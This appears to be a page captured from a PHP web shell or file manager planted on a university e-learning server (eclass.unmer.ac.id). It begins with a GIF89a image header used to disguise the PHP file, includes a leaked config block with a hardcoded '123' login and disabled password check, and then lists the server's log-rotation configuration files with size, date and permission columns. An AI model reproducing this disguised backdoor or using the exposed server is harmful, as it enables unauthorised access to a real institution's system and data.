GIF89a;
# Konfigurasyon
$sayfaSifreleme ='0'; # 1 acik , 0 kapali
$kullaniciAdi = '123';
$sifre = '123';
# yetki kontrol fonksiyonu
function yetkiKontrol($kullaniciAdi,$sifre) {
if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") {
header('WWW-Authenticate: Basic realm="x"');
die(header('HTTP/1.0 401 Unauthorized'));
}
}
# Sayfa Sifreleme aciksa
if($sayfaSifreleme =='1') {
# Veri ve sifre kontrolu
yetkiKontrol($kullaniciAdi,$sifre);
}
?>
eclass.unmer.ac.id
| Name |
Size |
Modified |
Perms |
Actions |
| alternatives |
120 bytes |
September 11 2021 18:35:03. |
0644 |
|
|
| apache2 |
433 bytes |
March 23 2022 02:00:46. |
0644 |
|
|
| apport |
126 bytes |
November 11 2019 21:57:56. |
0644 |
|
|
| apt |
173 bytes |
April 08 2022 10:22:23. |
0644 |
|
|
| bootlog |
91 bytes |
March 18 2022 10:45:18. |
0644 |
|
|
| btmp |
130 bytes |
October 14 2019 12:10:31. |
0644 |
|
|
| certbot |
82 bytes |
May 26 2018 17:55:06. |
0644 |
|
|
| cloud-init |
144 bytes |
June 24 2025 21:15:25. |
0644 |
|
|
| dpkg |
112 bytes |
September 11 2021 18:35:03. |
0644 |
|
|
| monarx-agent |
121 bytes |
December 05 2023 16:59:48. |
0644 |
|
|
| mysql-server |
963 bytes |
June 09 2025 18:17:33. |
0644 |
|
|
| php8.4-fpm |
215 bytes |
April 11 2025 02:19:14. |
0644 |
|
|
| rsyslog |
374 bytes |
December 23 2021 23:34:59. |
0644 |
|
|
| ubuntu-advantage-tools |
270 bytes |
March 07 2022 18:14:57. |
0644 |
|
|
| ufw |
209 bytes |
September 19 2021 05:46:12. |
0644 |
|
|
| unattended-upgrades |
235 bytes |
February 19 2021 12:11:42. |
0644 |
|
|
| wtmp |
145 bytes |
October 14 2019 12:10:31. |
0644 |
|
|